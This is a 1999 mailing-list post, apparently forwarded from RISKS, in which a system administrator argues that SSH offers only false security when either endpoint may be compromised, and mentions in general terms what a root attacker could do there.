IP: SSH: an ineffectual "feel-good" security measure -- from risks

[Dave Farber <farber () cis upenn edu>]

Date: Mon, 20 Dec 1999 00:34:14 -0700
From: "Schlake ( William Colburn )" <schlake () nmt edu>


When I first read the report of RST breaking the netscape algorithm I was
caught up in the moment. Netscape should have known better than do
something so foolish! Then I read the next comp.risks and I felt like a
fool. There is a great risk in pretending to have security when you really
have none.
I think many people believe that ssh protects them from wrong-doers, and
that nothing bad can happen to them if they use ssh. The authors of the
Internet Auditing Project(1) have a good story to tell about ssh, as do the
people who run the web site for rootshell.org(2). Some sys-admins here at
work are rabid about ssh. They have disabled telnet and rlogin for
"security" reasons, and naively believe that ssh is somehow more secure.
Ssh protects the data stream between two secure machines. Anyone sitting
between the two machines can't tell what is going on in the ssh stream
because of the encryption. The risk to the user is assuming that either end
is secure.
Where I work, the important servers don't run telnet or rlogin, because
those protocols are "insecure". The servers only run ssh. Our network is
switched. In order to sniff packets an attacker either needs to be in the
machine room with a cable plugged into the switch, or they need to be on
either of the two machines that the traffic is going between AND they need
to be root. If they are root on either machine, then they can:
a) read the unencrypted TTY instead of the encrypted stream
b) read the local secret keys and decode the stream on the fly
c) replace ssh with a Trojan
d) trace the program and extract the unencrypted data from the write()s
e) many more things I can't think of right now
If no one has compromised my system, then it is safe to use telnet to login
between machines. If someone has compromised my system however, I might as
well use telnet since I can't trust ssh anymore. If no one has compromised
my system, and I need to login over an untrusted network, and I have a
secure machine to login from, then ssh is the perfect tool.
Where am I going to find a secure machine outside my network? I bet there
are lots of secure machines all over the place, but I will never know which
ones they are. If security is really important to me, I will never log in
to any computer from any other computer I don't own (and hence trust)
myself. That means I that if I need to login to work when I am off site,
that I need to have my own laptop that I keep powered down, encased in
cement, buried in a vault, and guarded by an army (and even then can I
really be sure it is secure)?
Last week I spent an entire day at work wondering how to protect my mail
server from all the trouble that is expected from people trying to hide
under the veil of Y2K. I took ssh out of the inetd.conf, and told everyone
that they have to log in on console from now on.
(1): 
http://www.securityfocus.com/templates/forum_message.html?forum=2&head=32&id 
=32
(2): http://www.rootshell.org/mailinglist-archive/rs-25